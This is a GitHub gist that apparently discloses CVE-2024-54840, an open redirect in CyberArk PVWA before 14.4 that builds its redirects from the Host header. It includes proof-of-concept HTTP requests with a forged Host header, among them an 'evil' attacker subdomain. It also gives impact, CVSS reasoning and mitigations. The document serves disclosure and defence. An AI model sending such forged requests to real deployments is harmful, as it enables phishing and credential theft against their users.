Last active
March 17, 2025 12:40
-
-
Save Hurdano/8244855ef8ec364fd98a2693de6e30c5 to your computer and use it in GitHub Desktop.
Host Header Manipulation Leading to Open Redirect in CyberArk Privileged Access Manager Self-Hosted (PVWA) - CVE-2024-54840
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Host Header Manipulation Leading to Open Redirect in CyberArk Privileged Access Manager Self-Hosted (PVWA) | |
| ## Summary | |
| A vulnerability in **CyberArk Privileged Access Manager Self-Hosted (PVWA)** allows an **Open Redirect** by trusting the `Host` header to construct the redirection URL. An unauthenticated, remote attacker can manipulate the `Host` header to redirect users to a domain under their control (or any arbitrary domain). This issue stems from environment-related misconfigurations that can contribute to Host header injection. | |
| --- | |
| ## Affected Products and Versions | |
| - **Product:** CyberArk Privileged Access Manager Self-Hosted (PVWA) | |
| - **Versions Affected:** Versions **before 14.4** | |
| According to CyberArk’s [release notes](https://docs.cyberark.com/pam-self-hosted/latest/en/content/release%20notes/rn-whatsnew14-4.htm#Securitybugfixes), PVWA before 14.4 does not properly address environment issues that can contribute to Host header injection. | |
| --- | |
| ## Technical Details and Reproduction Steps | |
| ### 1. Normal Redirection Flow (Example) | |
| **Legitimate Request:** | |
| GET /PasswordVault/auth? HTTP/1.1 | |
| Host: 10.XXX.XXX.XXX | |
| Cache-Control: no-cache | |
| Accept-Encoding: gzip, deflate, br | |
| Accept: */* | |
| Accept-Language: en-US;q=0.9,en;q=0.8 | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) | |
| Connection: close | |
| Cache-Control: max-age=0 | |
| **Server Response (301 Moved Permanently):** | |
| HTTP/1.1 301 Moved Permanently | |
| Cache-Control: no-store, no-cache, must-revalidate | |
| Pragma: no-cache | |
| Content-Type: text/html; charset=UTF-8 | |
| Location: https://10.XXX.XXX.XXX/PasswordVault/auth/? | |
| Content-Security-Policy: frame-ancestors 'self'; | |
| Strict-Transport-Security: max-age=31536000;includeSubdomains; | |
| X-Content-Type-Options: nosniff | |
| Referrer-Policy: strict-origin-when-cross-origin | |
| Access-Control-Expose-Headers: Warning | |
| Date: Wed, 12 Feb 2025 08:00:13 GMT | |
| Connection: close | |
| Content-Length: 164 | |
| <head><title>Document Moved</title></head> | |
| <body><h1>Object Moved</h1> | |
| This document may be found <a HREF="https://10.XXX.XXX.XXX/PasswordVault/auth/?">here</a></body> | |
| The user is redirected to the legitimate domain (e.g., `10.XXX.XXX.XXX`). | |
| --- | |
| ### 2. Exploitation via Manipulated `Host` Header (Evil Subdomain) | |
| **Malicious Request:** | |
| GET /PasswordVault/auth? HTTP/1.1 | |
| Host: evil.10.XXX.XXX.XXX | |
| Cache-Control: no-cache | |
| Accept-Encoding: gzip, deflate, br | |
| Accept: */* | |
| Accept-Language: en-US;q=0.9,en;q=0.8 | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) | |
| Connection: close | |
| Cache-Control: max-age=0 | |
| **Server Response (301 Moved Permanently):** | |
| HTTP/1.1 301 Moved Permanently | |
| Cache-Control: no-store, no-cache, must-revalidate | |
| Pragma: no-cache | |
| Content-Type: text/html; charset=UTF-8 | |
| Location: https://evil.10.XXX.XXX.XXX/PasswordVault/auth/? | |
| Content-Security-Policy: frame-ancestors 'self'; | |
| Strict-Transport-Security: max-age=31536000;includeSubdomains; | |
| X-Content-Type-Options: nosniff | |
| Referrer-Policy: strict-origin-when-cross-origin | |
| Access-Control-Expose-Headers: Warning | |
| Date: Wed, 12 Feb 2025 08:03:19 GMT | |
| Connection: close | |
| Content-Length: 169 | |
| <head><title>Document Moved</title></head> | |
| <body><h1>Object Moved</h1> | |
| This document may be found <a HREF="https://evil.10.XXX.XXX.XXX/PasswordVault/auth/?">here</a></body> | |
| **Outcome**: The user is redirected to a domain controlled by the attacker (e.g., `evil.10.XXX.XXX.XXX`). | |
| --- | |
| ### 3. Additional PoC Example (Redirecting to `google.com`) | |
| The vulnerability allows **any** arbitrary domain to be used in the `Host` header, as demonstrated here: | |
| **Malicious Request Redirecting to google.com:** | |
| GET /PasswordVault/v10? HTTP/1.1 | |
| Host: google.com | |
| Cache-Control: no-cache | |
| Accept-Encoding: gzip, deflate, br | |
| Accept: */* | |
| Accept-Language: en-US;q=0.9,en;q=0.8 | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) | |
| Connection: close | |
| Cache-Control: max-age=0 | |
| **Server Response (301 Moved Permanently):** | |
| HTTP/1.1 301 Moved Permanently | |
| ... | |
| Location: https://google.com/PasswordVault/v10/? | |
| ... | |
| The server blindly appends `/PasswordVault/v10/?` to the domain specified in the `Host` header, demonstrating how trivial it is to redirect a user to any domain. | |
| --- | |
| ## Security Impact | |
| 1. **Confidentiality**: | |
| - Attackers can redirect victims to a malicious site, potentially capturing session tokens or credentials. | |
| 2. **Integrity**: | |
| - In an advanced phishing scenario, attackers could impersonate the legitimate site, leading users to submit data or perform actions that modify critical information. | |
| 3. **Availability**: | |
| - Not directly affected, as the legitimate service remains available. | |
| --- | |
| ## Proposed CVSS and Justification | |
| **Current Assigned Vector (Example)** | |
| ``` | |
| CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N => 4.2 (Medium) | |
| ``` | |
| **Proposed Updated Vector** | |
| ``` | |
| CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:M/I:M/A:N | |
| ``` | |
| This would result in a score of approximately **6.1 (Medium-High)**, depending on the CVSS calculator used. | |
| ### Why AC:L (Attack Complexity: Low)? | |
| - Exploitation merely involves sending an HTTP request with a manipulated `Host` header; no special conditions or rare configurations are required. | |
| - Any attacker with network access can reproduce it using simple tools like `curl` or Burp Suite. | |
| ### Why C:M and I:M (Medium Confidentiality and Integrity)? | |
| - By redirecting victims to a controlled domain identical to the legitimate one, attackers can steal credentials, hijack sessions, and potentially alter data that the user intends to submit. | |
| --- | |
| ## Possible Mitigations | |
| - **Validate the `Host` header** on the server side, ensuring redirections only point to legitimate, configured domains. | |
| - **Disable Host-based redirections** if they are not required. | |
| - **Use a whitelist of allowed domains** for redirections. | |
| --- | |
| ## Credits | |
| - **Discovered by:** Abel Iglesias Iglesias, Senior Consultant at Grupo SIA, an Indracompany | |
| - **Discovery Date:** 06-2024 | |
| --- | |
| ## References | |
| - [CyberArk Official Documentation - Release Notes 14.4 (Security bug fixes)](https://docs.cyberark.com/pam-self-hosted/latest/en/content/release%20notes/rn-whatsnew14-4.htm#Securitybugfixes) | |
| --- |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment